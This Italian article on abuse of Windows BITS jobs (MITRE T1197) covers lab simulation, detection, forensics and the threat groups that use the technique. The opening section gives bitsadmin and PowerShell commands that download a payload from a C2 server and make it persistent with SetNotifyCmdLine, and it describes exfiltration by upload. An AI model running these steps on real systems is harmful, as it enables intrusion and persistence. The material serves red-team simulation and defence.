BITS Jobs: Abuso del Servizio di Trasferimento Intelligente (T1197)

Il modo più diretto per simulare un abuso di BITS in laboratorio è utilizzare BITSAdmin (built-in in Windows), il tool nativo a riga di comando che diversi gruppi APT impiegano nelle operazioni reali. Lo scenario classico si articola in tre fasi: creazione del job, trasferimento del payload e configurazione della persistenza.

Per prima cosa, crea un job e aggiungi un file da scaricare dal tuo server C2 di laboratorio:

bitsadmin /create MioJobTest bitsadmin /addfile MioJobTest /payload.exe C:\Users\Public\payload.exe bitsadmin /resume MioJobTest

Questo replica esattamente ciò che facevano APT41 e Leviathan, che utilizzavano BITSAdmin per scaricare e installare payload aggiuntivi sui sistemi compromessi. Il job viene accodato nel database BITS interno e il trasferimento avviene sfruttando la banda inattiva, rendendo l'attività quasi invisibile al monitoraggio di rete superficiale.

La componente più insidiosa, però, è la persistenza tramite notifica. Il flag /SetNotifyCmdLine consente di specificare un eseguibile che BITS lancerà automaticamente al completamento — o all'errore — del job. UBoatRAT sfruttava precisamente questa funzionalità per mantenersi attivo sui sistemi infetti:

bitsadmin /SetNotifyCmdLine MioJobTest C:\Users\Public\payload.exe NULL

Per rendere il job longevo e resistente ai riavvii, puoi configurare un retry delay minimo e prolungare artificialmente la vita del job:

bitsadmin /setminretrydelay MioJobTest 86400

In alternativa a BITSAdmin, PowerShell offre i cmdlet nativi del modulo BitsTransfer (built-in in Windows):

Start-BitsTransfer -Source /payload.exe -Destination C:\Users\Public\payload.exe -Asynchronous

Per simulare lo scenario di esfiltrazione via BITS — come documentato per APT39, che usava il protocollo BITS per esfiltrare dati rubati — puoi creare un job di tipo upload verso un server controllato. BITS supporta nativamente upload verso endpoint compatibili, offrendo un canale di exfiltration over alternative protocol che molti SOC non monitorano.

Con Cobalt Strike (a pagamento), il beacon può essere scaricato tramite BITSAdmin in modo nativo, replicando una catena d'attacco enterprise-grade. Per ambienti lab a budget zero, puoi combinare BITSAdmin con un semplice server HTTP Python per il hosting del payload.

Infine, per testare la detection, verifica che il tuo job compaia nella lista attiva:

bitsadmin /list /allusers /verbose

Questo comando è anche il primo che un difensore eseguirà durante un triage, quindi assicurati che i tuoi alert lo intercettino.

La detection di BITS Jobs malevoli richiede una strategia a catena comportamentale che correli tre eventi distinti: la creazione del job, il trasferimento di rete e l'eventuale esecuzione del comando di notifica. L'errore più comune è cercare di rilevare ogni singola invocazione di BITSAdmin — un approccio che genera un volume di falsi positivi insostenibile, dato che WSUS, SCCM/MEMCM e decine di applicazioni legittime utilizzano BITS quotidianamente.

Le log source fondamentali sono quattro: Sysmon (open source, richiede installazione) per il process creation con command line completa, i log BITS-Client nel canale Microsoft-Windows-Bits-Client/Operational (EventID 3 per la creazione del job, 59 e 60 per le transizioni di stato, 64 per il completamento), i log PowerShell ScriptBlock Logging (EventCode 4104) per intercettare l'uso dei cmdlet BitsTransfer, e i log Security (EventCode 4688) come fallback se Sysmon non è disponibile.

Il cuore della detection è la correlazione. Il primo anello della catena è il processo che crea il job: cerca bitsadmin.exe con argomenti come /transfer, /addfile, /SetNotifyCmdLine, /resume, /setcustomheaders o /setminretrydelay. Il secondo anello è il traffico di rete: i job BITS generano connessioni HTTP/HTTPS dal processo svchost.exe con il flag di servizio -k netsvcs -s BITS. Correla queste connessioni con destinazioni esterne non presenti nella tua allow-list di endpoint corporate (WSUS, CDN vendor, Microsoft Update).

Il terzo anello — e il più critico — è il comando di notifica. Quando BITS esegue un SetNotifyCmdLine, il processo figlio viene lanciato da svchost.exe nel contesto del servizio BITS. Un alert ad alta confidenza si attiva quando questo processo figlio è un interprete (cmd.exe, powershell.exe) o un eseguibile in percorsi inusuali come %TEMP%, %APPDATA% o C:\Users\Public.

Per il tuning, costruisci una baseline dei job BITS legittimi nel tuo ambiente. La chiave è la allow-list degli host di destinazione: i job legittimi puntano quasi sempre a endpoint Microsoft, CDN noti o server WSUS interni. Qualsiasi job che trasferisce file da o verso destinazioni non in lista merita investigazione. Un ulteriore indicatore di persistenza è la durata del job: imposta un alert per job con lifetime superiore a 3 giorni o con conteggio di retry superiore a 20, che suggeriscono un job configurato intenzionalmente per sopravvivere nel tempo.

Nella configurazione preventiva, la mitigazione più efficace è ridurre il lifetime massimo dei job BITS tramite Group Policy, configurando i valori JobInactivityTimeout e MaxDownloadTime nella chiave di registro HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS. Filtra inoltre il traffico di rete per limitare le destinazioni raggiungibili dai BITS job e applica il principio di least privilege per restringere l'accesso all'interfaccia BITS ai soli utenti e servizi che ne hanno effettivamente bisogno.

L'analisi forense di un abuso BITS ha un punto di partenza privilegiato: il database BITS, un file ESE (Extensible Storage Engine) che il sistema mantiene in C:\ProgramData\Microsoft\Network\Downloader. I file rilevanti sono qmgr0.dat e qmgr1.dat, che contengono l'intero stato dei job — attivi, completati e in errore — inclusi URL sorgente, percorso di destinazione locale, timestamp di creazione, SID dell'utente proprietario e, crucialmente, l'eventuale comando di notifica configurato.

Per il parsing di questi file, il tool BitsParser di Mandiant (open source) è lo strumento di riferimento: è uno script Python che estrae i record dal database ESE e produce output strutturato con tutti i campi del job. In alternativa, su un sistema live, il comando bitsadmin /list /allusers /verbose fornisce un dump completo dei job attivi, ma non mostra quelli già completati — che rimangono invece nel database ESE per un periodo variabile.

La ricostruzione della timeline parte dall'incrocio di più artefatti. I log del canale Microsoft-Windows-Bits-Client/Operational registrano la creazione (EventID 3), le transizioni di stato e il completamento dei job. Correla questi eventi con i log Sysmon: EventID 1 (Process Create) per l'invocazione iniziale di bitsadmin.exe o PowerShell, e EventID 3 (Network Connection) per le connessioni generate da svchost.exe nel contesto del servizio BITS. Se il job include un SetNotifyCmdLine, il processo lanciato alla notifica apparirà come figlio di svchost.exe nei log di process creation — un parent-child relationship anomalo che si distingue chiaramente nella timeline.

Per quanto riguarda le campagne documentate, lo scenario di Wizard Spider è particolarmente istruttivo: il gruppo utilizzava script batch che, tramite WMIC, eseguivano un trasferimento BITSAdmin del payload ransomware verso ogni macchina compromessa nella rete. In questo caso, l'artefatto chiave non è solo il database BITS sul singolo host, ma la correlazione tra l'esecuzione di WMIC su un sistema e la comparsa simultanea di job BITS su molteplici endpoint — un pattern di movimento laterale con distribuzione del payload via BITS.

Sul filesystem, verifica sempre il percorso di destinazione specificato nel job. I payload scaricati via BITS finiscono tipicamente in directory come %TEMP%, C:\Users\Public o %APPDATA%, e il loro timestamp di creazione ($STANDARD_INFORMATION e $FILE_NAME nella MFT) deve corrispondere alla finestra temporale del job BITS. Analizza anche i Prefetch file per bitsadmin.exe: il file BITSADMIN.EXE-.pf contiene l'ultimo timestamp di esecuzione e i file referenziati, fornendo un ulteriore punto di ancoraggio nella timeline.

L'abuso di BITS Jobs accomuna attori con profili operativi molto diversi, ma tutti convergono su una caratteristica: la necessità di un canale di trasferimento che il sistema operativo consideri legittimo e che i controlli perimetrali tendano a ignorare.

APT41 rappresenta il profilo più sofisticato in questo cluster. Gruppo con doppia vocazione — spionaggio statale e cybercrime a scopo finanziario — utilizzava BITSAdmin come componente di una catena di delivery strutturata per scaricare e installare payload. La scelta di BITS si inserisce in un modus operandi che privilegia strumenti nativi del sistema operativo (living-off-the-land), riducendo al minimo l'impronta di tool custom sul disco.

Leviathan (APT40) condivide con APT41 l'attribuzione a interessi strategici cinesi, ma il suo focus operativo è orientato verso settori marittimi, difesa e tecnologia. L'uso di BITSAdmin per il download di tool aggiuntivi indica una fase post-compromise in cui il gruppo arricchisce il proprio toolkit dopo l'accesso iniziale, sfruttando BITS come meccanismo di staging discreto.

Patchwork, attore associato a interessi del subcontinente indiano, utilizzava BITS jobs per il download di payload malevoli. Il pattern è coerente con il profilo del gruppo, che storicamente si affida a tecniche consolidate e tool ampiamente documentati, privilegiando l'affidabilità operativa rispetto alla sofisticazione tecnica.

APT39, focalizzato su spionaggio con interessi allineati all'Iran e targeting su settori telecomunicazioni e viaggi, rappresenta un caso d'uso distinto: il gruppo sfruttava il protocollo BITS specificamente per l'esfiltrazione di dati rubati, non per il download. Questo pattern di exfiltration over alternative protocol è particolarmente insidioso perché molti SOC monitorano BITS solo come vettore di ingress, trascurando completamente il canale di upload.

Wizard Spider, gruppo cybercriminale noto per le operazioni ransomware, impiegava BITS all'interno di script batch distribuiti via WMIC per propagare il payload ransomware attraverso la rete compromessa. Questo uso di BITS come meccanismo di distribuzione laterale, combinato con WMIC per l'esecuzione remota, configura una catena automatizzata di deployment massivo che accelera drasticamente il time-to-encryption.

Il pattern trasversale è chiaro: BITS è uno strumento "democratico" nel panorama threat — accessibile a gruppi di qualsiasi sofisticazione, efficace contro organizzazioni di qualsiasi maturità difensiva. Il trend emergente è l'uso combinato di BITS con altri LOLBins e la diversificazione dall'uso esclusivo in download verso scenari di esfiltrazione e persistenza tramite SetNotifyCmdLine. Per i difensori, il takeaway è che la detection di BITS non può essere opzionale: è un indicatore trasversale che tocca spionaggio, ransomware e cybercrime.

Framework MITRE ATT&CK v16 — T1197 (BITS Jobs), TA0005 (Defense Evasion), TA0003 (Persistence). Gruppi: G0040, G0065, G0087, G0096, G0102. Software: S0652, S0534, S0154, S0554, S0201, S0333, S0654, S0190. Mitigazioni: M1018, M1037, M1028. Detection: DET0098, AN0274. Integrato con conoscenza professionale per tool e procedure operative.